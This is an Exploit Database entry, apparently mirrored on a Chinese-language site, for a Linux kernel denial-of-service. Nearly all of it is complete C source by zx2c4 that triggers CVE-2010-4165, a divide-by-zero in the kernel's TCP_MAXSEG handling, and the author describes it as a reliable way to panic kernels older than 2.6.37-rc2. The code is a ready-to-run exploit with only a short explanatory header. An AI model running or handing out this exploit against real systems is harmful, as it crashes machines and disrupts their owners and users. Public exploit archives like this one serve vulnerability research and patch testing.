Linux Kernel < 2.6.37-rc2 - 'TCP_MAXSEG' Kernel Panic (Denial of Service) (2)

• Exploit Database
• 115 阅读

• 作者： zx2c4
  日期： 2011-03-10
• 类别：

  • dos
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/16952/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58

  /* * TCP_MAXSEG Kernel Panic DoS for Linux < 2.6.37-rc2 * by zx2c4 * * This exploit triggers CVE-2010-4165, a divide by zero * error in net/ipv4/tcp.c. Because this is on the softirq * path, the kernel oopses and then completely dies with * no chance of recovery. It has been very reliable as a * DoS, but is not useful for triggering other bugs. * * -zx2c4, 28-2-2011 */   #include <stdio.h> #include <string.h> #include <sys/socket.h> #include <net/if.h> #include <arpa/inet.h> #include <netinet/tcp.h>   int main() { struct sockaddr_in laddr; memset(&laddr, 0, sizeof(laddr)); laddr.sin_family = AF_INET; laddr.sin_addr.s_addr = inet_addr("127.0.0.1"); laddr.sin_port = htons(31337); int listener = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); if (listener < 0) { printf("[-] Could not open listener.\n"); return -1; } int val = 12; if (setsockopt(listener, IPPROTO_TCP, TCP_MAXSEG, &val, sizeof(val)) < 0) { printf("[-] Could not set sockopt.\n"); return -1; } if (bind(listener, (struct sockaddr*)&laddr, sizeof(struct sockaddr)) < 0) { printf("[-] Could not bind to address.\n"); return -1; } if (listen(listener, 1) < 0) { printf("[-] Could not listen.\n"); return -1; } int hello = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); if (hello < 0) { printf("[-] Could not open connector.\n"); return -1; } if (connect(hello, (struct sockaddr*)&laddr, sizeof(struct sockaddr)) < 0) { printf("[-] Could not connect to listener.\n"); return -1; } printf("[-] Connection did not trigger oops.\n"); return 0; }